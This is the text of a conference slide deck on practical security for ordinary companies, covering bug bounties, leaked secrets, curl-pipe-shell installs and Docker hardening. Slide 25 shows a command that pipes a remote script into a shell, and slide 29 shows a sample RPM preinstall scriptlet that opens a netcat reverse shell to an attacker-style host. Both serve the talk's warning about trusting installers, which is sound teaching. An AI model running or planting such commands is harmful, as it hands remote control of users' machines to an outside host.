Slide 1

Slide 1 text

Security For Non-Unicorns 1 https://www.etsy.com/listing/205741051/unicorn-dog-hat-rainbow-unicorn-dog @benjammingh for Operability.io 1

Slide 2

Slide 2 text

Who's this clown? 2 • Infrastructure security charlatan at Etsy • Operations monkey at Puppet Labs • Survived a bunch of startups in London. (some of them still have websites...) • Has far too many opinions about pretty much everything on the TwitterNet @benjammingh 2 https://twitter.com/skullmandible/status/411281851131523072 @benjammingh for Operability.io 2

Slide 3

Slide 3 text

Unicorns? @benjammingh for Operability.io 3

Slide 4

Slide 4 text

Setlist • The problem(™). • The solution(s)(™). • The wrap up. • Rapturous applause. • We all go home/dance parties/our secret lives as superheroes & heroines. @benjammingh for Operability.io 4

Slide 5

Slide 5 text

The problem security is hard. @benjammingh for Operability.io 5

Slide 6

Slide 6 text

From tiny seeds, do mighty acorns grow. • PinkiePwn's 6 small bugs in Chrome to full sandbox escape • Egor Homakov's 5 small bugs in Github to full private access on GitHub • from XSS to remote code execution in under an hour • Username & password stolen for HVAC system leads to $160+ Million Target breach. @benjammingh for Operability.io 6

Slide 7

Slide 7 text

Things that aren't security are hard too. @benjammingh for Operability.io 7

Slide 8

Slide 8 text

Computering is hard. No. 1 takeaway for security types is a sense of perspective. @benjammingh for Operability.io 8

Slide 9

Slide 9 text

Security people aren't great secure coders. • Snort: 10 CVEs, Wireshark: 322! CVEs • Joxean Koret on Breaking Antivurius software • Security Firm Bit9 Hacked, Used to Spread Malware • Tavis Ormandy from Project Zero on exploiting ESET • BEST! FireEye just running Apache/PHP as root @benjammingh for Operability.io 9

Slide 10

Slide 10 text

So who do I trust? • No one? Always a great position for security people, who don't want to get paid. • Everyone? Do I have a 419 email for YOU! • Security vendors? If you have infinite money and no attackers. • Attackers! @benjammingh for Operability.io 10

Slide 11

Slide 11 text

"You're already being probed for security holes, do you want to know or not?" @benjammingh for Operability.io 11

Slide 12

Slide 12 text

Bug bounties 101: Have one! Bug Crowd vs. HackerOne @benjammingh for Operability.io 12

Slide 13

Slide 13 text

Bug bounties 102: Prepare a lot. @benjammingh for Operability.io 13

Slide 14

Slide 14 text

Bug bounties 103: The first few weeks will be hell. @benjammingh for Operability.io 14

Slide 15

Slide 15 text

Bug bounties 104: Be ready with bees! @benjammingh for Operability.io 15

Slide 16

Slide 16 text

Security on the inside @benjammingh for Operability.io 16

Slide 17

Slide 17 text

Armadillo security architecture @benjammingh for Operability.io 17

Slide 18

Slide 18 text

Cloud @benjammingh for Operability.io 18

Slide 19

Slide 19 text

Github @benjammingh for Operability.io 19

Slide 20

Slide 20 text

@benjammingh for Operability.io 20

Slide 21

Slide 21 text

But this doesn't happen in real life, right? @benjammingh for Operability.io 21

Slide 22

Slide 22 text

@benjammingh for Operability.io 22

Slide 23

Slide 23 text

Go use Gitrob • http://michenriksen.com/blog/gitrob-putting-the-open- source-in-osint/ • https://github.com/michenriksen/gitrob @benjammingh for Operability.io 23

Slide 24

Slide 24 text

curl | bash @benjammingh for Operability.io 24

Slide 25

Slide 25 text

curl legit.pw/mac | sh @benjammingh for Operability.io 25

Slide 26

Slide 26 text

"But I check them, obviously!" @benjammingh for Operability.io 26

Slide 27

Slide 27 text

@benjammingh for Operability.io 27

Slide 28

Slide 28 text

curl | bash "But this is no worse than packages." root# yum install sketchy @benjammingh for Operability.io 28

Slide 29

Slide 29 text

curl | bash root# rpm -qp --scripts sketchy-1.33-7.rpm preinstall scriptlet (using /bin/sh): bash -c 'while : ; \ do \ nc -e /bin/sh root.legit.pw 2222 ;\ done' @benjammingh for Operability.io 29

Slide 30

Slide 30 text

A LIVE DEMO, madness. @benjammingh for Operability.io 30

Slide 31

Slide 31 text

Lightweight containers! @benjammingh for Operability.io 31

Slide 32

Slide 32 text

chroot(8) @benjammingh for Operability.io 32

Slide 33

Slide 33 text

FreeBSD Jails @benjammingh for Operability.io 33

Slide 34

Slide 34 text

Solaris Zones @benjammingh for Operability.io 34

Slide 35

Slide 35 text

AIX LPAR @benjammingh for Operability.io 35

Slide 36

Slide 36 text

@benjammingh for Operability.io 36

Slide 37

Slide 37 text

Is Docker secure? @benjammingh for Operability.io 37

Slide 38

Slide 38 text

>30% of Images in Docker Hub Contain High Priority Security Vulns - Jayanth Gummaraju, Tarun Desikan and Yoshio Turner from BanyanOps @benjammingh for Operability.io 38

Slide 39

Slide 39 text

@benjammingh for Operability.io 39

Slide 40

Slide 40 text

As secure as Vagrant? @benjammingh for Operability.io 40

Slide 41

Slide 41 text

But is Docker itself secure? • Don't run things as root. • No really, stop running things as root. • Did I mention not running things as root. • It is also not 1999. (Docker 1.8 addresses some of this, with it's changes to who it runs as) @benjammingh for Operability.io 41

Slide 42

Slide 42 text

Securify the Docker. • Don't use --privileged. • Use --cap-drop all and --cap-drop to get the minimum capabilities. • Use Docker Notary • Use GRSecurity (just do that anyway, if you can.) • Use SELinux... I may as well ask for a pony here. @benjammingh for Operability.io 42

Slide 43

Slide 43 text

Summary • Computers are apparently hard. • Security is clearly harder still, obv. • Actually trust and humans is hard. • The typing is the easy bit. (ish) @benjammingh for Operability.io 43

Slide 44

Slide 44 text

More Summary • Complex systems lead to much more complex security problems. (see Oauth) • Annual pen-tests don't scale, bug bounties can. • Attackers are mining any public info you have (GitHub, S3) • I beg you to stop trusting curl. • Docker and security can be used in the same sentence. @benjammingh for Operability.io 44

Slide 45

Slide 45 text

Thank you! Twidder: @benjammingh LinkedIn: lnkdin.me/p/benyeah FidoNet: 2:254/524.13 JitHub: github.com/barn SpeakerDeck: speakerdeck.com/barnbarn Etsy: Careers CodeAsCraft @benjammingh for Operability.io 45